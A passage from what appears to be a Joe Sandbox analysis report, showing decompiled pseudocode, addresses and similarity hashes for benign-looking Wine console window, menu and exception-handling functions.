						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                          0x00bcbfa6
                          0x00bcbfa9
                          0x00bcbfb2
                          0x00bcbfe0
                          0x00bcbff6
                          0x00bcc007
                          0x00bcc00a
                          0x00bcc027
                          0x00bcc02d
                          0x00bcc030
                          0x00bcc033
                          0x00bcc03a
                          0x00bcc04c
                          0x00bcc04f
                          0x00bcc05d
                          0x00bcc06b
                          0x00bcc071
                          0x00bcc07f
                          0x00bcc08c
                          0x00bcc099
                          0x00bcc0a2
                          0x00bcc0b2
                          0x00bcc0b8
                          0x00bcc0bb
                          0x00bcc0c7
                          0x00bcc0ca
                          0x00bcc0ce
                          0x00bcc0d2
                          0x00bcc0e1
                          0x00bcc0fa
                          0x00bcc100
                          0x00bcc106
                          0x00bcc10c
                          0x00bcc12d
                          0x00bcc133
                          0x00bcc136
                          0x00bcc13f
                          0x00bcc148
                          0x00bcc14b
                          0x00bcc156
                          0x00bcc159
                          0x00bcc15d
                          0x00bcc161
                          0x00bcc169
                          0x00bcc16f
                          0x00bcc17b
                          0x00bcc17e
                          0x00bcc182
                          0x00bcc186
                          0x00bcc18c
                          0x00bcc198
                          0x00bcc19b
                          0x00bcc19f
                          0x00bcc1a3
                          0x00bcc1c6
                          0x00bcc1cc
                          0x00bcc1d8
                          0x00bcc1db
                          0x00bcc1df
                          0x00bcc1e3
                          0x00bcc1e9
                          0x00bcc1f5
                          0x00bcc1f8
                          0x00bcc1fc
                          0x00bcc200
                          0x00bcc206
                          0x00bcc20c
                          0x00bcc20f
                          0x00bcc215
                          0x00000000
                          0x00000000
                          0x00bcc226
                          0x00bcc22f
                          0x00bcc238
                          0x00bcc241
                          0x00bcc24b
                          0x00bcc251
                          0x00bcc257
                          0x00bcc25a
                          0x00bcc25e
                          0x00bcc264
                          0x00bcc264
                          0x00bcc279
                          0x00bcc27f
                          0x00bcc27f
                          0x00bcc28d
                          0x00bcc28d
                          0x00bcc2a2
                          0x00000000
                          0x00bcbfb8
                          0x00bcbfc8
                          0x00bcc2c0
                          0x00bcc2d4
                          0x00bcc2d7
                          0x00bcc2eb
                          0x00bcc2fc
                          0x00bcc310
                          0x00bcc313
                          0x00bcc324
                          0x00bcc331
                          0x00bcc351
                          0x00bcc392
                          0x00bcc3b3
                          0x00bcc3ed
                          0x00bcc3ed
                          0x00bcbfce
                          0x00bcc3e5
                          0x00bcc3e5
                          0x00bcbfc8
                          0x00bcc3ff

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                          • String ID:
                          • API String ID: 88183673-0
                          • Opcode ID: 737d4e750bfe2a5e7197338977ac355ce47ebaf064a707a4e4048f4a2f39b0ec
                          • Instruction ID: af2afb6b6923ee6e43d648b6dd158ed0f4c2cabb4f069d05ce57e008dea9290b
                          • Opcode Fuzzy Hash: 737d4e750bfe2a5e7197338977ac355ce47ebaf064a707a4e4048f4a2f39b0ec
                          • Instruction Fuzzy Hash: EFD17FB59043489FCB14EFACD58969DBBF1BB48300F20896DE899EB350DB349954CF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAE90 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 49%
                          			E00BCAE90(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0x7c0000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0x7c0000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0x7c0000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0x7c0000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0x7c0000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0x7c0000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0x7c0000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0x7c0000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0x7c0000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                          0x00bcaea8
                          0x00bcaeae
                          0x00bcaeb1
                          0x00bcaeb8
                          0x00bcaed0
                          0x00bcaed7
                          0x00bcaee9
                          0x00bcaeef
                          0x00bcaef2
                          0x00bcaf16
                          0x00bcaf47
                          0x00bcaf50
                          0x00bcaf56
                          0x00bcaf59
                          0x00bcaf7d
                          0x00bcafae
                          0x00bcafb7
                          0x00bcafbd
                          0x00bcafc0
                          0x00bcafe4
                          0x00bcb015
                          0x00bcb01e
                          0x00bcb024
                          0x00bcb027
                          0x00bcb04b
                          0x00bcb07c
                          0x00bcb085
                          0x00bcb08b
                          0x00bcb08e
                          0x00bcb0b2
                          0x00bcb0e3
                          0x00bcb0ec
                          0x00bcb0f2
                          0x00bcb0f5
                          0x00bcb119
                          0x00bcb14a
                          0x00bcb150
                          0x00bcb157
                          0x00bcb185
                          0x00bcb18b
                          0x00bcb18b
                          0x00bcb18e
                          0x00bcb194
                          0x00bcb197
                          0x00bcb1bb
                          0x00bcb1eb
                          0x00bcb1f4
                          0x00bcb1fa
                          0x00bcb1fd
                          0x00bcb221
                          0x00bcb252
                          0x00bcb25b
                          0x00bcb261
                          0x00bcb264
                          0x00bcb269
                          0x00bcb275
                          0x00bcb278
                          0x00bcb280
                          0x00bcb284
                          0x00bcb288
                          0x00bcb28e
                          0x00bcb29a
                          0x00bcb29d
                          0x00bcb2a5
                          0x00bcb2ad
                          0x00bcb2b5
                          0x00bcb2b9
                          0x00bcb2bf
                          0x00bcb2c2
                          0x00bcaedd
                          0x00bcaedd
                          0x00bcaedd
                          0x00bcaebe
                          0x00bcaebe
                          0x00bcaebe
                          0x00bcb2d3

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CreateHandleMenuModule
                          • String ID:
                          • API String ID: 4123625242-0
                          • Opcode ID: e6db5e83bb39eec4ebf804c563b7068698259dd557bc4ce1a69e66ad6d6aa342
                          • Instruction ID: bb0796fd3daa89155310da6365e9be6a377605cd5a98ccc22c38d1cf9ccd3f6c
                          • Opcode Fuzzy Hash: e6db5e83bb39eec4ebf804c563b7068698259dd557bc4ce1a69e66ad6d6aa342
                          • Instruction Fuzzy Hash: E7C1A6B4808304DFD714EF68D48969EBBF0FB44314F50CAADE8A997295D7749688CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCBD32 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                          • String ID: ASCII: abcXYZ
                          • API String ID: 3404974346-732927841
                          • Opcode ID: 3b9223b68fa02dbde8d8ffa9ce5c6225efc3e01fefc29a5e15c2dca4148cbb2f
                          • Instruction ID: 2f3dd04c4d94201c0e0708e037a11e62d9cf4e0ff396e4ee09c3315d57174efb
                          • Opcode Fuzzy Hash: 3b9223b68fa02dbde8d8ffa9ce5c6225efc3e01fefc29a5e15c2dca4148cbb2f
                          • Instruction Fuzzy Hash: 846186B19083458FCB04EFA8D58965EBFF0BF48305F11896DE8899B354EB749588CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA6E0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 29%
                          			E00BCA6E0(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L00BDB12A();
				E00BCFC90(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E00BC33D0(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E00BCB9C0();
					_t156 = _t155 - 8;
				}
				E00BCF710( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E00BCBC10;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E00BCBF90;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0x7c0000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00BD1257();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E00BCE08E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00BC4B10();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00BC8ED0();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E00BCC410();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                          0x00bca6e0
                          0x00bca6f0
                          0x00bca710
                          0x00bca718
                          0x00bca722
                          0x00bca753
                          0x00bca75a
                          0x00bca75e
                          0x00bca763
                          0x00bca728
                          0x00bca734
                          0x00bca737
                          0x00bca73b
                          0x00bca740
                          0x00bca740
                          0x00bca784
                          0x00bca789
                          0x00bca799
                          0x00bca79f
                          0x00bca7a9
                          0x00bca7c5
                          0x00bca7cb
                          0x00bca7f0
                          0x00bca806
                          0x00bca80c
                          0x00bca81c
                          0x00bca82b
                          0x00bca834
                          0x00bca844
                          0x00bca84a
                          0x00bca854
                          0x00bca870
                          0x00bca876
                          0x00bca89b
                          0x00bca8b1
                          0x00bca8b7
                          0x00bca8c7
                          0x00bca8d6
                          0x00bca8df
                          0x00bca8e5
                          0x00bca8e8
                          0x00bca8ed
                          0x00bca8f0
                          0x00bca8fc
                          0x00bca912
                          0x00bca915
                          0x00bca91d
                          0x00bca924
                          0x00bca92a
                          0x00bca941
                          0x00bca944
                          0x00bca948
                          0x00bca94c
                          0x00bca950
                          0x00bca956
                          0x00bca95c
                          0x00bca96e
                          0x00bca971
                          0x00bca975
                          0x00bca975
                          0x00bca989
                          0x00bca98b
                          0x00bca98e
                          0x00bca990
                          0x00bca99f
                          0x00bca9b5
                          0x00bca9c7
                          0x00bca9ca
                          0x00bca9ce
                          0x00bca9d3
                          0x00bca9dc
                          0x00bca9df
                          0x00bca9e4
                          0x00bca9e4
                          0x00bca9f0
                          0x00bca9fa
                          0x00bcaa19
                          0x00bcaa00
                          0x00bcaa0c
                          0x00bcaa0c
                          0x00bcaa30
                          0x00bcaa33
                          0x00bcaa37
                          0x00bcaa3f
                          0x00bca9a5
                          0x00bca9a5
                          0x00bca9a5
                          0x00bcaa51

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                          • String ID: Setup$WineConColorPreview$WineConFontPreview
                          • API String ID: 3977189380-2851978119
                          • Opcode ID: 42cb50f2ece5697ab8efe6702deae3115555f6ed8b7299dba6d0433d4f6b443a
                          • Instruction ID: ba494bcc74d1ab12347feab8230f33ebdb25e49e0e3d047869a53fae534e024d
                          • Opcode Fuzzy Hash: 42cb50f2ece5697ab8efe6702deae3115555f6ed8b7299dba6d0433d4f6b443a
                          • Instruction Fuzzy Hash: 0C919BB09052189FDB54EF68D98979DBBF4FB04344F0085AEE449D7351EB749A88CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7B80 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                          Download Yara Rule
                          APIs
                          • CreateEventW.KERNEL32 ref: 00BC7C0E
                          • EnterCriticalSection.KERNEL32 ref: 00BC7CDA
                          • MultiByteToWideChar.KERNEL32 ref: 00BC7D69
                          • LeaveCriticalSection.KERNEL32 ref: 00BC7E1D
                          • LeaveCriticalSection.KERNEL32 ref: 00BC7FBA
                          • EnterCriticalSection.KERNEL32 ref: 00BC7FD6
                          • CloseHandle.KERNEL32 ref: 00BC806E
                          • LeaveCriticalSection.KERNEL32 ref: 00BC808D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                          • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                          • API String ID: 628538822-1542851097
                          • Opcode ID: bab688688bac78d2cc8ff369b8da07e604624bd92af6efefb1aeb280c0d95d77
                          • Instruction ID: 019d23849dec2d0841137163912f0aa45dee359c04cea2028f792f7d76bc2f7b
                          • Opcode Fuzzy Hash: bab688688bac78d2cc8ff369b8da07e604624bd92af6efefb1aeb280c0d95d77
                          • Instruction Fuzzy Hash: 00D1FCB1909255CFD711EF68D599BAEBBF4FB48304F0088ADE48997340DB749A88CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC2440 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Info$CharsetStartupTranslate
                          • String ID: WineConsoleClass
                          • API String ID: 3822699805-3427835368
                          • Opcode ID: cb8925a5b7de727186b7107ce00cca2ed161b706c2e0ca35d5a1ba9f92f95d24
                          • Instruction ID: a844928a24ac9104cdd862451b3ab68981b0938ccf7d40a3414c54ac113f7efd
                          • Opcode Fuzzy Hash: cb8925a5b7de727186b7107ce00cca2ed161b706c2e0ca35d5a1ba9f92f95d24
                          • Instruction Fuzzy Hash: 759197B4904219CFDB10DF68D994B9EBBF0FB48304F1089ADE889AB351DB759A84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC2E80 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                          • String ID:
                          • API String ID: 2170087643-0
                          • Opcode ID: 04d3a9618f233cf7c3284eec2d2fa4312499179d1c90e3fd88846b79c0e6b09f
                          • Instruction ID: be84b3289522b48426a5ff0985259ff61a35849a1b0ddd39ba90dc1bc0e4fd77
                          • Opcode Fuzzy Hash: 04d3a9618f233cf7c3284eec2d2fa4312499179d1c90e3fd88846b79c0e6b09f
                          • Instruction Fuzzy Hash: 32B17274A042489FCB14DF68D588B9DBBF1FF49314F1584A9E889DB361DB30EA84CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD7AE2 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E00BD7AE2(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00BD8CB8(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00BD1C3C(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00BD7A49(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E00BD42BE(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00BD7292(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00BD8CD5(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00BD7489(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E00BD428E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00BD1CCE(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E00BD1CCE(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00BD7F07(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E00BD421E(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
